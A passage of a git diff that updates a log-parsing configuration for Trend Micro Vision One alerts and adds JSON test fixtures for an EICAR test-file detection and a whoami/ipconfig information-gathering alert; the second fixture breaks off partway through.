- user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" + user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'account') | first).entityValue }}" - set: user.name: "{{final.user.id.split('\\\\') | last}}" @@ -46,18 +47,23 @@ stages: filter: "{{final.user.id != null}}" - set: - process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" - process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" - process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" - process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" - process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" - process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" - process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" + process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processCmd') | first).value }}" + process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentCmd') | first).value }}" + process.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFilePath') | first).value }}" + process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFilePath') | first).value }}" + process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha1') | first).value }}" + process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha256') | first).value }}" + + process.parent.pid: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentPid') | first).value }}" + process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['processPid', 'objectPid']) | first).value }}" + + process.parent.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha1') | first).value }}" + process.parent.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha256') | first).value }}" - set: - registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[0] }}" - registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" - registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}" + registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[0] }}" + registry.key: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" + registry.value: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value') | first).value }}" registry.path: > {%- set path = [] -%} {%- for indicator in parsed_event.message.indicators -%} @@ -68,19 +74,22 @@ stages: {%- endfor -%} {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%} - registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}" + registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value_data') | first).value }}" - set: registry.data.type: "REG_SZ" filter: "{{final.registry.data.strings != null }}" - set: - file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}" - file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}" - file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}" - file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}" + file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'file_sha1') | selectattr('field', 'in', ['fileHash', 'objectFileHashSha1']) | first).value }}" + file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectFileHashSha256') | first).value }}" + file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['objectFilePath', 'fullPath']) | first).value }}" + file.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'fileName') | first).value }}" - user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}" + user.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'logonUser') | first).value }}" + + - set: + action.properties.ScriptBlockText: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectRawDataStr') | first).value }}" - set: trendmicro.vision_one.severity: "{{parsed_event.message.severity}}" @@ -89,3 +98,4 @@ stages: trendmicro.vision_one.alert_id: "{{parsed_event.message.id}}" trendmicro.vision_one.status: "{{parsed_event.message.status}}" trendmicro.vision_one.investigation_status: "{{parsed_event.message.investigationStatus}}" + trendmicro.vision_one.detection_name: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'detection_name') | first).value }}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json new file mode 100644 index 000000000..5fb30866d --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json @@ -0,0 +1,57 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Eicar Test File Detection", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-26T16:51:29Z", + "file": { + "hash": { + "sha1": "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + }, + "name": "eicar-com.txt", + "path": "C:\\Users\\jdoe\\Downloads\\eicar-com.txt" + }, + "host": { + "id": "ecede9e8-407e-4f34-9747-4a145c247ad5", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "related": { + "hash": [ + "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + ], + "ip": [ + "10.0.0.6" + ] + }, + "rule": { + "name": "Eicar Test File Detection" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "detection_name": "Eicar_test_1", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json new file mode 100644 index 000000000..4d60422b4 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json @@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": \"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": \"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": \"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": \"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": 